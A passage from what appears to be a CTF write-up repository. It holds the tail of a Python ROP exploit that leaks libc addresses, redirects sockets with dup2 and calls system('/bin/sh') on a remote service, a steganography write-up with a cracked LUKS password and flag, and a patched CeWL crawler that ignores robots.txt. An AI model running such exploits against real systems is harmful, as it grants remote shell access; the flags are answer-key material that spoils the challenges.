115 |     payload += p64(pop_rdi_gadget)      # ret
116 |     payload += p64(0)                   # pop rax
117 |     payload += p64(exit_plt_addr)       # ret
118 | 
119 |     payload += b'A' * (1032 - len(payload))
120 | 
121 |     payload += p64(chk)
122 |     payload += p64(rbp)
123 | 
124 |     payload += p64(pop_rsp_gadget)      # ret       <- execution starts here
125 |     payload += p64(buf_base)            # pop rsp
126 | 
127 |     with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
128 |         s.connect((host, port))
129 |         s.sendall(payload)
130 |         res = s.recv(size)
131 | 
132 |     return res
133 | 
134 | def hexdump(data):
135 |     for i in range(0, len(data), 16):
136 |         dump = hexlify(data[i:i+16]).decode()
137 |         l = ' '.join(dump[:16][j:j+2] for j in range(0, len(dump[:16]), 2))
138 |         r = ' '.join(dump[16:][j:j+2] for j in range(0, len(dump[16:]), 2))
139 |         print(l, ' ', r)
140 | 
141 | # Dump the global offset table.
142 | got_leak = leak(got_base, got_size)
143 | 
144 | print('GOT:')
145 | hexdump(got_leak)
146 | print()
147 | 
148 | printf_addr = int.from_bytes(got_leak[96:104], byteorder='little')
149 | 
150 | # The remote server is using libc.so.6 v2.27.
151 | libc_6_base = printf_addr - 0x00064e40
152 | system_addr = libc_6_base + 0x0004f420
153 | dup2_addr   = libc_6_base + 0x00110950
154 | bin_sh_addr = libc_6_base + 0x001b3d88
155 | 
156 | # The remote server is using libc.so.6 v2.37.
157 | # libc_6_base = printf_addr - 0x00052b30
158 | # system_addr = libc_6_base + 0x0004c920
159 | # dup2_addr   = libc_6_base + 0x000f8220
160 | # bin_sh_addr = libc_6_base + 0x0019604f
161 | 
162 | print(f'libc base @ {libc_6_base:016x}')
163 | print(f'printf    @ {printf_addr:016x}')
164 | print(f'system    @ {system_addr:016x}')
165 | print(f'dup2      @ {  dup2_addr:016x}')
166 | print(f'"/bin/sh" @ {bin_sh_addr:016x}')
167 | print()
168 | 
169 | def exploit(conn):
170 |     payload  = b'GET ///\x00'           # pop r13
171 |     payload += p64(0xaaaaaaaaaaaaaaaa)  # pop r14
172 |     payload += p64(0xbbbbbbbbbbbbbbbb)  # pop r15
173 | 
174 |     # dup2(4, 0)
175 |     payload += p64(pop_rdi_gadget)      # ret
176 |     payload += p64(4)                   # pop rdi
177 |     payload += p64(pop_rsi_gadget)      # ret
178 |     payload += p64(0)                   # pop rsi
179 |     payload += p64(0xcccccccccccccccc)  # pop r15
180 |     payload += p64(dup2_addr)           # ret
181 | 
182 |     # dup2(4, 1)
183 |     payload += p64(pop_rdi_gadget)      # ret
184 |     payload += p64(4)                   # pop rdi
185 |     payload += p64(pop_rsi_gadget)      # ret
186 |     payload += p64(1)                   # pop rsi
187 |     payload += p64(0xcccccccccccccccc)  # pop r15
188 |     payload += p64(dup2_addr)           # ret
189 | 
190 |     # dup2(4, 2)
191 |     payload += p64(pop_rdi_gadget)      # ret
192 |     payload += p64(4)                   # pop rdi
193 |     payload += p64(pop_rsi_gadget)      # ret
194 |     payload += p64(2)                   # pop rsi
195 |     payload += p64(0xcccccccccccccccc)  # pop r15
196 |     payload += p64(dup2_addr)           # ret
197 | 
198 |     # Re-align the stack ...
199 |     payload += p64(ret_gadget)          # ret
200 | 
201 |     # system("/bin/sh")
202 |     payload += p64(pop_rdi_gadget)      # ret
203 |     payload += p64(bin_sh_addr)         # pop rdi
204 |     payload += p64(system_addr)         # ret
205 | 
206 |     # exit(0)
207 |     payload += p64(pop_rdi_gadget)      # ret
208 |     payload += p64(0)                   # pop rax
209 |     payload += p64(exit_plt_addr)       # ret
210 | 
211 |     payload += b'A' * (1032 - len(payload))
212 | 
213 |     payload += p64(chk)
214 |     payload += p64(rbp)
215 | 
216 |     payload += p64(pop_rsp_gadget)      # ret       <- execution starts here
217 |     payload += p64(buf_base)            # pop rsp
218 | 
219 |     print(f'Payload:')
220 |     # hexdump(payload)
221 |     print(payload)
222 |     print()
223 | 
224 |     conn.send(payload)
225 |     conn.interactive()
226 |     
227 | exploit(remote(host, port))
228 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/README.md:
--------------------------------------------------------------------------------
 1 | # sadcarnoises
 2 | 
 3 | In this challenge, we're given a [WAV file](sadcarnoises.wav), which appears to be a 15-minute audio
 4 | recording of a bunch of cars crashing over and over again. Often times CTF challenges like to hide
 5 | data in the higher frequencies of audio files, but examining the spectrograph in [Sonic
 6 | Visualiser](https://sonicvisualiser.org/) doesn't reveal anything interesting.
 7 | 
 8 | ![Audio Spectrograph](spectrograph.png)
 9 | 
10 | Another common method of steganographically encoding data in media files involves replacing the
11 | least-significant bit (LSB) of each frame or pixel with the data you want to hide. Using Python's
12 | `wave` module, we can easily extract the metadata and frames of the audio recording.
13 | 
14 | ```py
15 | #!/usr/bin/python
16 | 
17 | import wave
18 | 
19 | f = wave.open('sadcarnoises.wav', 'rb')
20 | meta = f.getparams()
21 | data = f.readframes(32)
22 | f.close()
23 | 
24 | print(meta)
25 | print(data)
26 | ```
27 | 
28 | In this case, the audio file has 2 channels, 16-bit samples, a frame rate of 48 kHz, and ~43 million
29 | frames. Python gives us the frame data as a string of bytes. Naturally, it would make sense to
30 | extract the LSB of each sample, but doing so just gives us junk; however, taking the LSB of each
31 | _byte_ of each sample (i.e. bits 0 and 8) yields a LUKS-encrypted file system image.
32 | 
33 | ```py
34 | #!/usr/bin/python
35 | 
36 | import wave
37 | 
38 | SIZE = 4096
39 | 
40 | def decode(data):
41 |     s = ''.join(str(int(b & 1)) for b in data)
42 |     return int(s, 2).to_bytes((len(s) + 7) // 8, byteorder='big')
43 | 
44 | with wave.open('sadcarnoises.wav', 'rb') as f:
45 |     with open('sad.luks', 'wb') as g:
46 |         while True:
47 |             try:
48 |                 data = f.readframes(SIZE)
49 |                 g.write(decode(data))
50 |             except ValueError:
51 |                 break
52 | ```
53 | 
54 | The challenge description gives us a hint of where to go next from here.
55 | 
56 | > Are you cewl? Do you not even care, not even a little bit? Then this one is for you.
57 | 
58 | [CeWL](https://www.kali.org/tools/cewl/) is a wordlist generator that works by scraping a website
59 | for words that might be used as passwords. You can then pass this wordlist into a program like
60 | Hashcat or JohnTheRipper (JTR) to crack password hashes. Before running this program, I checked with
61 | the CTF moderators to make sure it was okay to run CeWL against their website, and they said it
62 | should be fine as long as I kept it under 5 requests per second. By default, CeWL doesn't provide an
63 | option to specify the desired rate limit, but we can apply a simple [patch](cewl.patch) to make sure
64 | it doesn't go too fast.
65 | 
66 | ```sh
67 | cp /usr/bin/cewl . && patch < cewl.patch && ./cewl -v -d 5 --with-numbers -w wordlist https://blockharbor.io
68 | ```
69 | 
70 | This will take a while and will generate a wordlist of about 3,500 words. Unfortunately, the
71 | encrypted file system image is using LUKS version 2, which neither Hashcat nor JTR supports as of
72 | writing this, so we have to use `bruteforce-luks`, which is slower. On my Intel Core i7-10875H CPU,
73 | it took about 2-3 hours to find the correct password.
74 | 
75 | ```sh
76 | bruteforce-luks -t 8 -v 1 -f wordlist sad.luks
77 | ```
78 | 
79 | With the password in hand, we can now decrypt the file system and mount it locally.
80 | 
81 | ```sh
82 | echo CyberSecuritySolutions | sudo cryptsetup open sad.luks sad
83 | mkdir -p /mnt/sad
84 | sudo mount /dev/mapper/sad /mnt/sad
85 | ```
86 | 
87 | Examining the decrypted file system, we find only a single file, `note.txt`, which contains the
88 | string _"what the hell, where's the flag?"_. The flag obviously needs to be somewhere, so we can
89 | guess that it is probably still present on the file system image, contained within a deleted file,
90 | in the free space, or within the journal (since it's an ext4 file system). We could probably use
91 | some fancy tools from [SleuthKit](https://sleuthkit.org/) to analyze the image, but I just ran
92 | `strings` on it and searched for `bh{`, which was good enough to find the flag.
93 | 
94 | ```sh
95 | sudo strings /dev/mapper/sad | grep 'bh{'
96 | ```
97 | 
98 | **Flag:** `bh{n0t_ev3n_4_li77le_b1t}`
99 | 


--------------------------------------------------------------------------------
/steganography/sadcarnoises/cewl:
--------------------------------------------------------------------------------
   1 | #!/usr/bin/env ruby
   2 | #encoding: UTF-8
   3 | 
   4 | # == CeWL: Custom Word List Generator
   5 | #
   6 | # CeWL will spider a target site and generate the following lists:
   7 | #
   8 | # * A word list of all unique words found on the target site
   9 | # * A list of all email addresses found in mailto links
  10 | # * A list of usernames/author details from meta data found in any documents on the site
  11 | # * Groups of words up to the specified group size
  12 | #
  13 | # URL: The site to spider.
  14 | #
  15 | # Author:: Robin Wood (robin@digi.ninja)
  16 | # Copyright:: Copyright (c) Robin Wood 2018
  17 | # Licence:: CC-BY-SA 2.0 or GPL-3+
  18 | #
  19 | 
  20 | VERSION = "6.1 (Max Length)"
  21 | 
  22 | puts "CeWL #{VERSION} Robin Wood (robin@digi.ninja) (https://digi.ninja/)\n"
  23 | 
  24 | begin
  25 | 	require 'getoptlong'
  26 | 	require 'spider'
  27 | 	require 'nokogiri'
  28 | 	require 'net/http'
  29 | rescue LoadError => e
  30 | 	# Catch error and provide feedback on installing gem
  31 | 	if e.to_s =~ /cannot load such file -- (.*)/
  32 | 		missing_gem = $1
  33 | 		puts "\nError: #{missing_gem} gem not installed\n"
  34 | 		puts "    Run 'bundle install' to install all the required gems\n\n"
  35 | 		exit 2
  36 | 	else
  37 | 		puts "There was an error loading the gems:\n"
  38 | 		puts e.to_s
  39 | 		exit 2
  40 | 	end
  41 | end
  42 | 
  43 | require 'cewl_lib'
  44 | 
  45 | # Doing this so I can override the allowed? function which normally checks
  46 | # the robots.txt file
  47 | class MySpider<Spider
  48 | 	@@proxy_host = nil
  49 | 	@@proxy_port = nil
  50 | 	@@proxy_username = nil
  51 | 	@@proxy_password = nil
  52 | 
  53 | 	@@headers = nil
  54 | 
  55 | 	@@auth_type = nil
  56 | 	@@auth_user = nil
  57 | 	@@auth_password = nil
  58 | 	@@verbose = false
  59 | 	@@debug = false
  60 | 
  61 | 	def self.proxy (host, port = nil, username = nil, password = nil)
  62 | 		@@proxy_host = host
  63 | 		port = 8080 if port.nil?
  64 | 		@@proxy_port = port
  65 | 		@@proxy_username = username
  66 | 		@@proxy_password = password
  67 | 	end
  68 | 
  69 | 	def self.headers (headers)
  70 | 		header_hash = {}
  71 | 		headers.each do |header|
  72 | 			header_split = header.split(":")
  73 | 			if (header_split.count == 2)
  74 | 				header_hash[header_split[0].strip] = header_split[1].strip
  75 | 			else
  76 | 				puts "Invalid header: " + header.inspect
  77 | 			end
  78 | 		end
  79 | 		@@headers = header_hash
  80 | 	end
  81 | 
  82 | 	def self.auth_creds (type, user, password)
  83 | 		@@auth_type = type
  84 | 		@@auth_user = user
  85 | 		@@auth_password = password
  86 | 	end
  87 | 
  88 | 	def self.verbose (val)
  89 | 		@@verbose = val
  90 | 	end
  91 | 
  92 | 	def self.debug (val)
  93 | 		@@debug = val
  94 | 	end
  95 | 
  96 | 	# Create an instance of MySpiderInstance rather than SpiderInstance
  97 | 	def self.start_at(a_url, &block)
  98 | 		rules = RobotRules.new('Ruby Spider 1.0')
  99 | 		a_spider = MySpiderInstance.new({nil => a_url}, [], rules, [])
 100 | 
 101 | 		a_spider.headers = @@headers
 102 | 
 103 | 		a_spider.auth_type = @@auth_type
 104 | 		a_spider.auth_user = @@auth_user
 105 | 		a_spider.auth_password = @@auth_password
 106 | 
 107 | 		a_spider.proxy_host = @@proxy_host
 108 | 		a_spider.proxy_port = @@proxy_port
 109 | 		a_spider.proxy_username = @@proxy_username
 110 | 		a_spider.proxy_password = @@proxy_password
 111 | 
 112 | 		a_spider.verbose = @@verbose
 113 | 		a_spider.debug = @@debug
 114 | 		block.call(a_spider)
 115 | 		a_spider.start!
 116 | 	end
 117 | end
 118 | 
 119 | # My version of the spider class which allows all files
 120 | # to be processed
 121 | class MySpiderInstance<SpiderInstance
 122 | 	attr_writer :auth_type
 123 | 	attr_writer :auth_user
 124 | 	attr_writer :auth_password
 125 | 
 126 | 	attr_writer :headers
 127 | 
 128 | 	attr_writer :proxy_host
 129 | 	attr_writer :proxy_port
 130 | 	attr_writer :proxy_username
 131 | 	attr_writer :proxy_password
 132 | 
 133 | 	attr_writer :verbose
 134 | 	attr_writer :debug
 135 | 
 136 | 	attr_writer :interrupt
 137 | 
 138 | 	# Force all files to be allowed
 139 | 	# Normally the robots.txt file will be honoured
 140 | 	def allowed?(a_url, parsed_url)
 141 | 		true
 142 | 	end
 143 | 
 144 | 	# Lifted from the original gem to fix the case statement
 145 | 	# which checked for Fixednum not Integer as
 146 | 	# Fixednum has been deprecated.
 147 | 	#
 148 | 	def on(code, p = nil, &block)
 149 | 		f = p ? p : block
 150 | 		case code
 151 | 		when Integer
 152 | 			@callbacks[code] = f
 153 | 		else
 154 | 			@callbacks[code.to_sym] = f
 155 | 		end
 156 | 	end
 157 | 
 158 | 	def start! #:nodoc:
 159 | 		trap("SIGINT") { puts 'Hold on, about to stop ...'; @interrupt = true }
 160 | 		begin
 161 | 			next_urls = @next_urls.pop
 162 | 			#tmp_n_u = {}
 163 | 			next_urls.each do |prior_url, urls|
 164 | 				x = []
 165 | 
 166 | 				urls.each_line do |a_url|
 167 | 					x << [a_url, (URI.parse(a_url) rescue nil)]
 168 | 				end
 169 | 
 170 | 				y = []
 171 | 				x.select do |a_url, parsed_url|
 172 |                     if (parsed_url.scheme == "http" or parsed_url.scheme == "https") then
 173 |                       y << [a_url, parsed_url] if allowable_url?(a_url, parsed_url)
 174 |                     end
 175 | 				end
 176 | 
 177 | 				y.each do |a_url, parsed_url|
 178 | 					@setup.call(a_url) unless @setup.nil?
 179 | 					get_page(parsed_url) do |response|
 180 | 						do_callbacks(a_url, response, prior_url)
 181 | 						#tmp_n_u[a_url] = generate_next_urls(a_url, response)
 182 | 						#@next_urls.push tmp_n_u
 183 | 						generate_next_urls(a_url, response).each do |a_next_url|
 184 | 							puts "Pushing #{a_next_url}" if @debug
 185 | 							@next_urls.push a_url => a_next_url
 186 | 						end
 187 | 						#exit if interrupted
 188 | 					end
 189 | 
 190 | 					sleep 0.2
 191 | 
 192 | 					@teardown.call(a_url) unless @teardown.nil?
 193 | 					throw :ctrl_c if @interrupt
 194 | 				end
 195 | 			end
 196 | 		end while !@next_urls.empty?
 197 | 	end
 198 | 
 199 | 	def get_page(uri, &block) #:nodoc:
 200 | 		@seen << uri
 201 | 
 202 | 		trap("SIGINT") { puts 'Hold on, stopping here ...'; @interrupt = true }
 203 | 		begin
 204 | 			if @proxy_host.nil?
 205 | 				http = Net::HTTP.new(uri.host, uri.port)
 206 | 
 207 | 				if uri.scheme == 'https'
 208 | 					http.use_ssl = true
 209 | 					http.verify_mode = OpenSSL::SSL::VERIFY_NONE
 210 | 				end
 211 | 			else
 212 | 				proxy = Net::HTTP::Proxy(@proxy_host, @proxy_port, @proxy_username, @proxy_password)
 213 | 				begin
 214 | 					if uri.scheme == 'https'
 215 | 						http = proxy.start(uri.host, uri.port, :use_ssl => true, :verify_mode => OpenSSL::SSL::VERIFY_NONE)
 216 | 					else
 217 | 						http = proxy.start(uri.host, uri.port)
 218 | 					end
 219 | 				rescue => e
 220 | 					puts "\nFailed to connect to the proxy (#{@proxy_host}:#{@proxy_port})\n\n"
 221 | 					exit 2
 222 | 				end
 223 | 			end
 224 | 
 225 | 			req = Net::HTTP::Get.new(uri.request_uri)
 226 | 			@headers.each_pair do |header, value|
 227 | 				req[header] = value
 228 | 			end
 229 | 
 230 | 			if @auth_type
 231 | 				case @auth_type
 232 | 					when "digest"
 233 | 						uri.user = @auth_user
 234 | 						uri.password = @auth_password
 235 | 
 236 | 						res = http.request req
 237 | 
 238 | 						if res['www-authenticate']
 239 | 							digest_auth = Net::HTTP::DigestAuth.new
 240 | 							auth = digest_auth.auth_header uri, res['www-authenticate'], 'GET'
 241 | 
 242 | 							req = Net::HTTP::Get.new uri.request_uri
 243 | 							req.add_field 'Authorization', auth
 244 | 						end
 245 | 
 246 | 					when "basic"
 247 | 						req.basic_auth @auth_user, @auth_password
 248 | 				end
 249 | 			end
 250 | 
 251 | 			res = http.request(req)
 252 | 
 253 | 			if res.redirect?
 254 | 				puts "Redirect URL" if @debug
 255 | 				base_url = uri.to_s[0, uri.to_s.rindex('/')]
 256 | 				new_url = URI.parse(construct_complete_url(base_url, res['Location']))
 257 | 
 258 | 				# If auth is used then a name:pass@ gets added, this messes the tree
 259 | 				# up so easiest to just remove it
 260 | 				current_uri = uri.to_s.gsub(/:\/\/[^:]*:[^@]*@/, "://")
 261 | 				@next_urls.push current_uri => new_url.to_s
 262 | 			elsif res.code == "401"
 263 | 				puts "Authentication required, can't continue on this branch - #{uri}" if @verbose
 264 | 			else
 265 | 				block.call(res)
 266 | 			end
 267 | 		rescue Zlib::DataError => e
 268 | 			puts "Error in Zlib decompressing data on #{uri}, moving on regardless"
 269 | 		rescue SocketError, Errno::EHOSTUNREACH => e
 270 | 			puts "Couldn't hit the site #{uri}, moving on"
 271 | 		rescue NoMethodError => e
 272 | 			if @verbose
 273 | 				puts "Unable to process URL"
 274 | 				puts "Message is #{e.to_s}"
 275 | 				puts e.backtrace
 276 | 			end
 277 | 		rescue => e
 278 | 			puts "\nUnable to connect to the site (#{uri.scheme}://#{uri.host}:#{uri.port}#{uri.request_uri})"
 279 | 
 280 | 			if @verbose
 281 | 				puts "\nThe following error may help:"
 282 | 				puts e.to_s
 283 | 				puts e.backtrace
 284 | 				puts "\nCaller"
 285 | 				puts caller
 286 | 			else
 287 | 				puts "Run in verbose mode (-v) for more information"
 288 | 			end
 289 | 
 290 | 			puts "\n\n"
 291 | 		end
 292 | 	end
 293 | 
 294 | 	# Overriding so that I can get it to ignore direct names - i.e. #name
 295 | 	def construct_complete_url(base_url, additional_url, parsed_additional_url = nil) #:nodoc:
 296 | 		return nil if additional_url =~ /^#/
 297 | 
 298 | 		parsed_additional_url ||= URI.parse(additional_url)
 299 | 		if parsed_additional_url.scheme.nil?
 300 | 			u = base_url.is_a?(URI) ? base_url : URI.parse(base_url)
 301 | 			if additional_url[0].chr == '/'
 302 | 				url = "#{u.scheme}://#{u.host}:#{u.port}#{additional_url}"
 303 | 			elsif u.path.nil? || u.path == ''
 304 | 				url = "#{u.scheme}://#{u.host}:#{u.port}/#{additional_url}"
 305 | 			elsif u.path[0].chr == '/'
 306 | 				url = "#{u.scheme}://#{u.host}:#{u.port}#{u.path}/#{additional_url}"
 307 | 			else
 308 | 				url = "#{u.scheme}://#{u.host}:#{u.port}/#{u.path}/#{additional_url}"
 309 | 			end
 310 | 		else
 311 | 			url = additional_url
 312 | 		end
 313 | 		return url
 314 | 	end
 315 | 
 316 | 	# Overriding the original spider one as it doesn't find hrefs very well
 317 | 	def generate_next_urls(a_url, resp) #:nodoc:
 318 | 		if @debug
 319 | 			puts "a_url = #{a_url}"
 320 | 			puts "resp = #{resp}"
 321 | 		end
 322 | 		web_page = resp.body
 323 | 		if URI.parse(a_url).path.empty?
 324 | 			base_url = a_url
 325 | 		else
 326 | 			base_url = a_url[0, a_url.rindex('/')]
 327 | 		end
 328 | 		puts "base_url: #{base_url}" if @debug
 329 | 
 330 | 		doc = Nokogiri::HTML(web_page)
 331 | 		links = doc.css('a').map { |a| a['href'] }
 332 | 
 333 | 		puts "links = #{links.inspect}" if @debug
 334 | 		links.map do |link|
 335 | 			begin
 336 | 				if link.nil?
 337 | 					nil
 338 | 				else
 339 | 					begin
 340 | 						parsed_link = URI.parse(link)
 341 | 						parsed_link.fragment == '#' ? nil : construct_complete_url(base_url, link, parsed_link)
 342 | 					rescue
 343 | 						nil
 344 | 					end
 345 | 				end
 346 | 			rescue => e
 347 | 				puts "\nThere was an error generating URL list"
 348 | 				puts "Error: #{e.inspect}"
 349 | 				puts e.backtrace
 350 | 				exit 2
 351 | 			end
 352 | 		end.compact
 353 | 	end
 354 | end
 355 | 
 356 | # A node for a tree
 357 | class TreeNode
 358 | 	attr :value
 359 | 	attr :depth
 360 | 	attr :key
 361 | 	attr :visited, true
 362 | 
 363 | 	def initialize(key, value, depth)
 364 | 		@key = key
 365 | 		@value = value
 366 | 		@depth = depth
 367 | 		@visited = false
 368 | 	end
 369 | 
 370 | 	def to_s
 371 | 		if key.nil?
 372 | 			return "key=nil value=#{@value} depth=#{@depth.to_s} visited=#{@visited.to_s}"
 373 | 		else
 374 | 			return "key=#{@key} value=#{@value} depth=#{@depth.to_s} visited=#{@visited.to_s}"
 375 | 		end
 376 | 	end
 377 | 
 378 | 	def to_url_hash
 379 | 		return({@key => @value})
 380 | 	end
 381 | end
 382 | 
 383 | # A tree structure
 384 | class Tree
 385 | 	attr :data
 386 | 	attr_writer :debug
 387 | 	attr_writer :max_depth
 388 | 	@children
 389 | 
 390 | 	# Get the maximum depth the tree can grow to
 391 | 	def max_depth
 392 | 		@max_depth
 393 | 	end
 394 | 
 395 | 	# Set the max depth the tree can grow to
 396 | 	def max_depth=(val)
 397 | 		@max_depth = Integer(val)
 398 | 	end
 399 | 
 400 | 	# As this is used to work out if there are any more nodes to process it isn't a true empty
 401 | 	def empty?
 402 | 		if !@data.visited
 403 | 			return false
 404 | 		else
 405 | 			@children.each { |node|
 406 | 				return false if !node.data.visited
 407 | 			}
 408 | 		end
 409 | 		return true
 410 | 	end
 411 | 
 412 | 	# The constructor
 413 | 	def initialize(key=nil, value=nil, depth=0, debug=false)
 414 | 		@data = TreeNode.new(key, value, depth)
 415 | 		@children = []
 416 | 		@max_depth = 2
 417 | 	end
 418 | 
 419 | 	# Itterator
 420 | 	def each
 421 | 		yield @data
 422 | 		@children.each do |child_node|
 423 | 			child_node.each { |e| yield e }
 424 | 		end
 425 | 	end
 426 | 
 427 | 	# Remove an item from the tree
 428 | 	def pop
 429 | 		if !@data.visited
 430 | 			@data.visited = true
 431 | 			return @data.to_url_hash
 432 | 		else
 433 | 			@children.each { |node|
 434 | 				if !node.data.visited
 435 | 					node.data.visited = true
 436 | 					return node.data.to_url_hash
 437 | 				end
 438 | 			}
 439 | 		end
 440 | 		return nil
 441 | 	end
 442 | 
 443 | 	# Push an item onto the tree
 444 | 	def push(value)
 445 | 		puts "Pushing #{value}" if @debug
 446 | 		key = value.keys.first
 447 | 		value = value.values_at(key).first
 448 | 
 449 | 		if key.nil?
 450 | 			@data = TreeNode.new(key, value, 0)
 451 | 		else
 452 | 			# If the depth is 0 then don't add anything to the tree
 453 | 			return if @max_depth == 0
 454 | 			if key == @data.value
 455 | 				child = Tree.new(key, value, @data.depth + 1, @debug)
 456 | 				@children << child
 457 | 			else
 458 | 				@children.each { |node|
 459 | 					if node.data.value == key && node.data.depth<@max_depth
 460 | 						child = Tree.new(key, value, node.data.depth + 1, @debug)
 461 | 						@children << child
 462 | 					end
 463 | 				}
 464 | 			end
 465 | 		end
 466 | 	end
 467 | end
 468 | 
 469 | opts = GetoptLong.new(
 470 | 		['--help', '-h', GetoptLong::NO_ARGUMENT],
 471 | 		['--keep', '-k', GetoptLong::NO_ARGUMENT],
 472 | 		['--depth', '-d', GetoptLong::REQUIRED_ARGUMENT],
 473 | 		['--min_word_length', "-m", GetoptLong::REQUIRED_ARGUMENT],
 474 | 		['--max_word_length', "-x", GetoptLong::REQUIRED_ARGUMENT],
 475 | 		['--no-words', "-n", GetoptLong::NO_ARGUMENT],
 476 | 		['--groups', "-g", GetoptLong::REQUIRED_ARGUMENT],
 477 | 		['--offsite', "-o", GetoptLong::NO_ARGUMENT],
 478 | 		['--exclude', GetoptLong::REQUIRED_ARGUMENT],
 479 | 		['--allowed', GetoptLong::REQUIRED_ARGUMENT],
 480 | 		['--write', "-w", GetoptLong::REQUIRED_ARGUMENT],
 481 | 		['--ua', "-u", GetoptLong::REQUIRED_ARGUMENT],
 482 | 		['--meta-temp-dir', GetoptLong::REQUIRED_ARGUMENT],
 483 | 		['--meta_file', GetoptLong::REQUIRED_ARGUMENT],
 484 | 		['--email_file', GetoptLong::REQUIRED_ARGUMENT],
 485 | 		['--lowercase', GetoptLong::NO_ARGUMENT],
 486 | 		['--with-numbers', GetoptLong::NO_ARGUMENT],
 487 | 		['--convert-umlauts', GetoptLong::NO_ARGUMENT],
 488 | 		['--meta', "-a", GetoptLong::NO_ARGUMENT],
 489 | 		['--email', "-e", GetoptLong::NO_ARGUMENT],
 490 | 		['--count', '-c', GetoptLong::NO_ARGUMENT],
 491 | 		['--auth_user', GetoptLong::REQUIRED_ARGUMENT],
 492 | 		['--auth_pass', GetoptLong::REQUIRED_ARGUMENT],
 493 | 		['--auth_type', GetoptLong::REQUIRED_ARGUMENT],
 494 | 		['--header', "-H", GetoptLong::REQUIRED_ARGUMENT],
 495 | 		['--proxy_host', GetoptLong::REQUIRED_ARGUMENT],
 496 | 		['--proxy_port', GetoptLong::REQUIRED_ARGUMENT],
 497 | 		['--proxy_username', GetoptLong::REQUIRED_ARGUMENT],
 498 | 		['--proxy_password', GetoptLong::REQUIRED_ARGUMENT],
 499 | 		["--verbose", "-v", GetoptLong::NO_ARGUMENT],
 500 | 		["--debug", GetoptLong::NO_ARGUMENT]
 501 | )
 502 | 
 503 | # Display the usage
 504 | def usage
 505 | 	puts "Usage: cewl [OPTIONS] ... <url>
 506 | 
 507 |     OPTIONS:
 508 | 	-h, --help: Show help.
 509 | 	-k, --keep: Keep the downloaded file.
 510 | 	-d <x>,--depth <x>: Depth to spider to, default 2.
 511 | 	-m, --min_word_length: Minimum word length, default 3.
 512 | 	-x, --max_word_length: Maximum word length, default unset.
 513 | 	-o, --offsite: Let the spider visit other sites.
 514 | 	--exclude: A file containing a list of paths to exclude
 515 | 	--allowed: A regex pattern that path must match to be followed
 516 | 	-w, --write: Write the output to the file.
 517 | 	-u, --ua <agent>: User agent to send.
 518 | 	-n, --no-words: Don't output the wordlist.
 519 | 	-g <x>, --groups <x>: Return groups of words as well
 520 | 	--lowercase: Lowercase all parsed words
 521 | 	--with-numbers: Accept words with numbers in as well as just letters
 522 | 	--convert-umlauts: Convert common ISO-8859-1 (Latin-1) umlauts (ä-ae, ö-oe, ü-ue, ß-ss)
 523 | 	-a, --meta: include meta data.
 524 | 	--meta_file file: Output file for meta data.
 525 | 	-e, --email: Include email addresses.
 526 | 	--email_file <file>: Output file for email addresses.
 527 | 	--meta-temp-dir <dir>: The temporary directory used by exiftool when parsing files, default /tmp.
 528 | 	-c, --count: Show the count for each word found.
 529 | 	-v, --verbose: Verbose.
 530 | 	--debug: Extra debug information.
 531 | 
 532 | 	Authentication
 533 | 	--auth_type: Digest or basic.
 534 | 	--auth_user: Authentication username.
 535 | 	--auth_pass: Authentication password.
 536 | 
 537 | 	Proxy Support
 538 | 	--proxy_host: Proxy host.
 539 | 	--proxy_port: Proxy port, default 8080.
 540 | 	--proxy_username: Username for proxy, if required.
 541 | 	--proxy_password: Password for proxy, if required.
 542 | 
 543 | 	Headers
 544 | 	--header, -H: In format name:value - can pass multiple.
 545 | 
 546 |     <url>: The site to spider.
 547 | 
 548 | "
 549 | 	exit 0
 550 | end
 551 | 
 552 | debug = false
 553 | verbose = false
 554 | ua = nil
 555 | url = nil
 556 | outfile = nil
 557 | email_outfile = nil
 558 | meta_outfile = nil
 559 | offsite = false
 560 | exclude_array = []
 561 | allowed_pattern = nil
 562 | depth = 2
 563 | min_word_length = 3
 564 | max_word_length = -1
 565 | email = false
 566 | meta = false
 567 | wordlist = true
 568 | groups = -1
 569 | meta_temp_dir = "/tmp/"
 570 | keep = false
 571 | lowercase = false
 572 | words_with_numbers = false
 573 | convert_umlauts = false
 574 | show_count = false
 575 | auth_type = nil
 576 | auth_user = nil
 577 | auth_pass = nil
 578 | 
 579 | proxy_host = nil
 580 | proxy_port = nil
 581 | proxy_username = nil
 582 | proxy_password = nil
 583 | 
 584 | # headers will be passed in in the format "header: value"
 585 | # and there can be multiple
 586 | headers = []
 587 | 
 588 | strip_css = true
 589 | strip_js = true
 590 | 
 591 | begin
 592 | 	opts.each do |opt, arg|
 593 | 		case opt
 594 | 			when '--help'
 595 | 				usage
 596 | 			when "--lowercase"
 597 | 				lowercase = true
 598 | 			when "--with-numbers"
 599 | 				words_with_numbers = true
 600 | 			when "--convert-umlauts"
 601 | 				convert_umlauts = true
 602 | 			when "--count"
 603 | 				show_count = true
 604 | 			when "--meta-temp-dir"
 605 | 				if !File.directory?(arg)
 606 | 					puts "\nMeta temp directory is not a directory\n\n"
 607 | 					exit 1
 608 | 				end
 609 | 
 610 | 				if !File.writable?(arg)
 611 | 					puts "\nThe meta temp directory is not writable\n\n"
 612 | 					exit 1
 613 | 				end
 614 | 
 615 | 				meta_temp_dir = arg
 616 | 				meta_temp_dir += "/" if meta_temp_dir !~ /.*\/$/
 617 | 			when "--keep"
 618 | 				keep = true
 619 | 			when "--no-words"
 620 | 				wordlist = false
 621 | 			when "--meta_file"
 622 | 				meta_outfile = arg
 623 | 			when "--meta"
 624 | 				meta = true
 625 | 			when "--groups"
 626 | 				groups = arg.to_i
 627 | 			when "--email_file"
 628 | 				email_outfile = arg
 629 | 			when "--email"
 630 | 				email = true
 631 | 			when '--max_word_length'
 632 | 				max_word_length = arg.to_i
 633 | 				usage if max_word_length < 1
 634 | 			when '--min_word_length'
 635 | 				min_word_length = arg.to_i
 636 | 				usage if min_word_length < 1
 637 | 			when '--depth'
 638 | 				depth = arg.to_i
 639 | 				usage if depth < 0
 640 | 			when '--offsite'
 641 | 				offsite = true
 642 | 			when '--exclude'
 643 | 				begin
 644 | 					tmp_exclude_array = File.readlines(arg)
 645 | 				rescue => e
 646 | 					puts "\nUnable to open the excude file\n\n"
 647 | 					exit 1
 648 | 				end
 649 | 				# Have to do this to strip the newline characters from the end
 650 | 				# of each element in the array
 651 | 				tmp_exclude_array.each do |line|
 652 | 					exc = line.strip
 653 | 					if exc != ""
 654 | 						exclude_array << line.strip
 655 | 						# puts "Excluding #{ line.strip}"
 656 | 					end
 657 | 				end
 658 | 			when '--allowed'
